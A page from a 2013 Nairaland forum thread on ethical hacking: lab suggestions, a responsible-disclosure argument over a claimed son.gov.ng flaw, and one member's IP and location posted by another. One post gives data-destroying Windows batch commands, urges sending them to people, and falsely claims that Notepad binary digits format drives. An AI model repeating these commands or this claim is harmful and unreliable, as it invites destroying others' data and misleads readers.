Ethical Hackers - Programming (6) - Nairaland
Nairaland Forum / Science/Technology / Programming / Ethical Hackers (35383 Views)
Nigerian Ethical Hackers In Here ---> / Do We Have Ethical Hackers Here On Nairaland (2) (3) (4)
(1) (2) (3) (4) (5) (6) (7) (8) (9) (10) ... (16) (Go Down)
| Re: Ethical Hackers by Slyr0x: 4:40pm On Sep 18, 2013 |
just_thinking: is it better than BT Kali Linux is currently the most advanced and versatile penetration testing suite. .equally maintained and funded by Offensive Security (the creators of Backtrack). . Just see Kali Linux as an advance backtrack. . Also, you could try your hands on some "vulnerable by design OS". . One of such is Kioptrix, a Pentest lab for security enthusiasts to legally try out their skills with the aim to completely compromise the machine. I made a video sometime last year on it (find below) https://www.youtube.com/watch?v=2_tfyF_7KWk The full work-though is here There are other fantastic vulnerable OS (they are all ISO Images) you could try your hands on here https://pentesterlab.com/exercises/ Lemme know what you think. . |
| Re: Ethical Hackers by justthinking: 4:48pm On Sep 18, 2013 |
Slyr0x:Dat is cool. i will try it out |
| Re: Ethical Hackers by justthinking: 5:18pm On Sep 18, 2013 |
Just downloaded level one. |
| Re: Ethical Hackers by misteri: 8:13pm On Sep 18, 2013 |
Cool Tuts! I'm keeping my ears down, you guys are all doing great! 1 Like |
| Re: Ethical Hackers by Slyr0x: 10:04pm On Sep 18, 2013 |
just_thinking: Just downloaded level one. Which one is that? |
| Re: Ethical Hackers by justthinking: 11:06pm On Sep 18, 2013 |
Slyr0x:Kioptrix v1 |
| Re: Ethical Hackers by justthinking: 11:12pm On Sep 18, 2013 |
Slyr0x:Kioptrix level 1 virtual harddisk. neva start playing it though. |
| Re: Ethical Hackers by justthinking: 11:13pm On Sep 18, 2013 |
Slyr0x: |
| Re: Ethical Hackers by curiouslad(m): 4:13pm On Sep 19, 2013 |
@ just_thinking i think i found you {"country": "Nigeria", "city": "Ibadan", "prefix": "41.220.69.0/24", "organization": "VCG-AS VGC Communication Ltd.", "latitude": 7.3878, "ip": "41.220.69.98", "region": "Oyo", "hostname": "41.220.69.98.vgccl.net", "asn": "AS29465", "longitude": 3.8964}  blah blah blah can you shoot me an {barmmie} (at) {gmail}.com |
| Re: Ethical Hackers by justthinking: 4:20pm On Sep 19, 2013 |
curiouslad: @ just_thinkinglol. u try sha. but am not in ibadan, am in lagos. one tin is i neva really trust geolocation of nigeria ip address. is mostly false. the only true tin is the contry part. wich method did u use to get my ip address. |
| Re: Ethical Hackers by justthinking: 4:32pm On Sep 19, 2013 |
curiouslad: @ just_thinkingdude are u on any irc |
| Re: Ethical Hackers by gr3yb4ck(m): 2:37pm On Sep 21, 2013 |
gr3yb4ck w!ll l!K3 T0 M33T JUST_THINKING |
| Re: Ethical Hackers by kiddie(m): 4:07pm On Sep 21, 2013 |
just thinking please add kiddiemicky |
| Re: Ethical Hackers by Nobody: 4:23pm On Sep 23, 2013 |
just_thinking where have you been? I'm trying to set up a lab. I've already started downloading BT5R3 - Gnome and as soon as its done, I'll need you to walk me through the process. Hope you're not on honeymoon  |
| Re: Ethical Hackers by centrex: 5:20pm On Sep 23, 2013 |
Centrex Lab , a pioneer in cyber security, today announced that its researchers have discovered a significant security vulnerability on different web portal in Nigeria including SON portal (http://www.son.gov.ng/), the lead researcher Nsikak Nelson which demo the critical vulnerability with proof of concept share with fellow researchers and media correspondent on how malicious smart black hats can create much more devastating attacks using this critical flaw such as: complete access to various database’s as shown in screen-shots under proof of vulnerability which can later be misused to access various confidential information; complete database dump; possibility of uploading shell (not fully certain) and much more. The Researcher which decline to speak on the attack method due to public abuse said he had discovered the vulnerability long time ago, he Quote ”During our open vulnerability testing project, we pick a web portal at random to test against vulnerability and report the threat back to the various administrators most time the administrators don’t really take the threat serious neither respond to our mail until they are hacked by malicious group !!! ” Among the vulnerability discovered In top Nigerian businesses web portal are cross site scripting, poor database design , Broken Authentication and Session Management, Security Misconfiguration . Centrex Lab embark on massive cyber security awareness targeting the general public on the need to be cyber security conscious, as we are winning down on our cyber security month, let take a critical look at web security said Nsikak Nelson |
| Re: Ethical Hackers by Slyr0x: 8:40pm On Sep 23, 2013 |
^^^ Are you guys really ethical hackers or Blackhats seeking attention? If you are the former, you would realise a term such as "Responsible Disclosure" exist. . Is it not ironic that the same "supposed researcher" who "declined to speak on the attack method due to public abuse" still came on a public fora like Nairaland to disclose that a certain vulnerability does exist on son.gov.ng ?? You unwittingly just made son.gov.ng a public target and whoever visits this thread with malicious intents would definitely want to have a go at it. . Come on. . |
| Re: Ethical Hackers by justthinking: 9:59pm On Sep 23, 2013 |
DonCrust: just_thinking where have you been? I'm trying to set up a lab. I've already started downloading BT5R3 - Gnome and as soon as its done, I'll need you to walk me through the process.lol. am not on honeymoon boss. ok no problem. try to download sun virtualbox along. you can download it from C:\Users\arotob\Downloads\Programs\VirtualBox-4.2.18-88781-Win.exe . when you have the required software. i will explain how to set it up. |
| Re: Ethical Hackers by justthinking: 10:00pm On Sep 23, 2013 |
gr3yb4ck: gr3yb4ck w!ll l!K3 T0 M33T JUST_THINKINGhere i am boss. u can send me your e-mail for us to chat better. and you can also paste your question here boss. |
| Re: Ethical Hackers by justthinking: 10:06pm On Sep 23, 2013 |
Slyr0x: ^^^u are right but if truly they have report this vulnerabilty and son.go.ng didnt do anything about it. then i really dont think it is the fault of centrex. nigeria programmer need to start taking security issue seriously. i might be wrong sha ooo. |
| Re: Ethical Hackers by centrex: 10:35am On Sep 24, 2013 |
@ Slyr0x we are ethical hacker at same time we are not seeking attention, if you are conversant with OPVAS, you see a whole lot of cyber security company reporting on the latest vulnerability with proof of concept, is a standard procedure, our hackers did not mention any way black hat could get access to the portal, and mind you before any site is been hacked today in Nigeria, we @ centrexlab notify the web-developer and system administrator via email or phone call for free, so if you spot out vulnerability i urge you to write to the authority at the end of the day if classified data are being leak it still you that will be the first to tweet these news.... as mention slyr0x we are only rounding off our cyber security campaign and all these relevant issue are being discussed by stake holders..... and better ways are being set aside for robust and secure system.... |
| Re: Ethical Hackers by Slyr0x: 3:17pm On Sep 24, 2013 |
centrex: @ Slyr0x we are ethical hacker at same time we are not seeking attention, if you are conversant with OPVAS, you see a whole lot of cyber security company reporting on the latest vulnerability with proof of concept, is a standard procedure, our hackers did not mention any way black hat could get access to the portal, and mind you before any site is been hacked today in Nigeria, we @ centrexlab notify the web-developer and system administrator via email or phone call for free, so if you spot out vulnerability i urge you to write to the authority at the end of the day if classified data are being leak it still you that will be the first to tweet these news.... as mention slyr0x we are only rounding off our cyber security campaign and all these relevant issue are being discussed by stake holders..... and better ways are being set aside for robust and secure system.... You've still not gotten my point. My point is this : the moment you spot a vulnerable website/web app, the best next thing to do is to inform the company involved privately and explain to them (1) The Entry Point (2) For the less tech-savvy ones, you also need to highlight the implications of the existence of such vulnerabilities and why they should fix them ASAP. . You crossed the "ethical line" the moment you came to post publicly that a certain vuln exist on son.gov.ng . . Apart from attention seeking, what do you hope to achieve by publishing this hack publicly? How does this differentiate a supposed reputable company like yours from the Naijacyberhactivists? I've had cases where it was possible to break into a bank. .at the database-level. .Do I now post publicly on a forum 'cos it's an high-profile attack? To what end? What would I achieve except attention-seeking as well as inviting other would-be hackers to the platform? With the kind of knowledge we have, sooooo much power has been placed in our hands. .We have to use responsibly. BTW, do you have a lab in Lagos? Does it open on weekends? I'd like to visit |
| Re: Ethical Hackers by centrex: 5:51pm On Sep 24, 2013 |
@Slyr0x i got your point, but i guess you are not getting my own view also, we have gone through these process again and again, vulnerability was discovered over a period of month if not year now, we reported the vulnerability to the proper authorities ... precaution taken.. vulnerabilities was demo on a vulnerable apps with proof of concept but not on a exact side but the article reference the site was vulnerable. (part 1) Part 2. such vulnerabilities are to be listed on vulnerabilities database for reference and research purposes if you insist that i crossed the "ethical line" the moment i came to post publicly that a certain vuln exist on son.gov.ng, so why do you go to exploit database to pick up a set vulnerability to work on, wot happen to Java 0 day vulnerabilities ,Adobe 0 day vulnerabilities, apple pattern lock vulnerability , the whole purpose while these vulnerability is made public is for developers to build a robust system, now let assume the solution been used was an open source, every day researcher post weak vulnerability out there... |
| Re: Ethical Hackers by justthinking: 10:44pm On Sep 24, 2013 |
i think both of you are right but i dont think centrex has done anytin wrong. what i knw abt vulnerability is that if you find a vulneraability in a software or website you are to tell the company, after some month u can post it on exploit website e.g exploit-db.com, securityfocus e.t.c. so that programmers can protect themself. if u blame centrex for this act, then i think u shuld blame securityfocus that paste vulnerability and exploit-db.com too because they paste the vulnerability and the software and version that is vulnerable. all am saying am siding with centrex if TRULY they av report it to the son.gov.ng programmer or administrator. |
| Re: Ethical Hackers by justthinking: 10:45pm On Sep 24, 2013 |
@Slyr0x Are you on any IRC (internet relay chat) |
| Re: Ethical Hackers by Slyr0x: 9:05am On Sep 25, 2013 |
Please let's drop this so we don't derail any further. @centrex, do you have a lab in Lagos? Does it open on weekends? I'd like to visit @just thinking, not anymore  . .BTW you working on those vuln ISO images yet? |
| Re: Ethical Hackers by centrex: 9:26am On Sep 25, 2013 |
@Slyr0x we dont have a lab @ lagos, but the entire centrex crew will be at lagos for a 3 day cyber security events next month |
| Re: Ethical Hackers by BEARDBAZEN: 11:36am On Sep 25, 2013 |
Android users can now lock their lost devices remotely Google's Android Device Manager lets users remotely lock a lost or stolen device with a new password. Worried about data from your lost Android phone or tablet getting into the wrong hands? You can now lock down your device remotely. Released in August, Google's Android Device Manager is a handy service that allows you to see the location of a lost or stolen Android device. You can also remotely tell the device to ring as well as erase all of its data. Now, you can add one more feature to that list. The latest update to Android Device Manager enables remote password locking. If you want to prevent others from accessing your missing device, you can send a new password to secure it. The feature is easy enough to implement. On your Android device, open the Android Device Manager. Check the options to remotely locate your device and to allow remote lock and factory reset if not already checked. Browse to the Android Device Manager Web site and scan for your device. You should see three options: "Ring," "Lock," and "Erase." To send a new lock code to your device, click on "Lock." Enter and confirm the new password and then click on the "Lock" button. Your device will display an alphanumeric keypad requiring someone to key in the new password to access the device. I tried the process with my Galaxy 3, and it worked like a charm. I highly recommend it for any Android user, but especially for those of you who travel with your device and want to make sure your data is safe from prying eyes. 1 Like |
| Re: Ethical Hackers by Slyr0x: 11:45am On Sep 25, 2013 |
centrex: @Slyr0x we dont have a lab @ lagos, but the entire centrex crew will be at lagos for a 3 day cyber security events next month That'd be great! Kindly keep me posted |
| Re: Ethical Hackers by BEARDBAZEN: 12:06pm On Sep 25, 2013 |
Format HDD with a Notepad...! Step 1. Copy The Following In Notepad Exactly as it says 01001011000111110010010101010101010000011111100000 Step 2. Save As An EXE Any Name Will Do Step 3. Send the EXE to People And Infect OR IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code format c:\ /Q/X -- this will format your drive c:\ 01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000 format d:\ /Q/X -- this will format your dirve d:\ 01100110011011110111001001101101011000010111010000 100000011001000011101001011100 0010000000101111010100010010111101011000 format a:\ /Q/X -- this will format your drive a:\ 01100110011011110111001001101101011000010111010000 100000011000010011101001011100 0010000000101111010100010010111101011000 del /F/S/Q c:\boot.ini -- this will cause your computer not to boot. 01100100011001010110110000100000001011110100011000 101111010100110010111101010001 00100000011000110011101001011100011000100110111101 101111011101000010111001101001 0110111001101001 try to figure out yourself rest cant spoonfeed its working Do not try it on ur PC. don't mess around this is for educational purpose only still if u cant figure it out try dis go to notepad @Echo off Del C:\ *.*|y save it as Dell.bat worse @echo off del %systemdrive%\*.*/f/s/q shutdown -r -f -t 00 and save it as a .bat file |
| Re: Ethical Hackers by Slyr0x: 2:22pm On Sep 25, 2013 |
^^^ Oga, all these tutorials won't work on Operating Systems released after Windows 95. . 1 Like |
(1) (2) (3) (4) (5) (6) (7) (8) (9) (10) ... (16)
Driveinhud App Gains Over 1000 Registered User Within One Month Of Launch / Astro Programming Language 0.2 (indefinite release) / Should I Take This Job?(photo)
(Go Up)
| Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health religion celebs tv-movies music-radio literature webmasters programming techmarket Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10) Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 65 |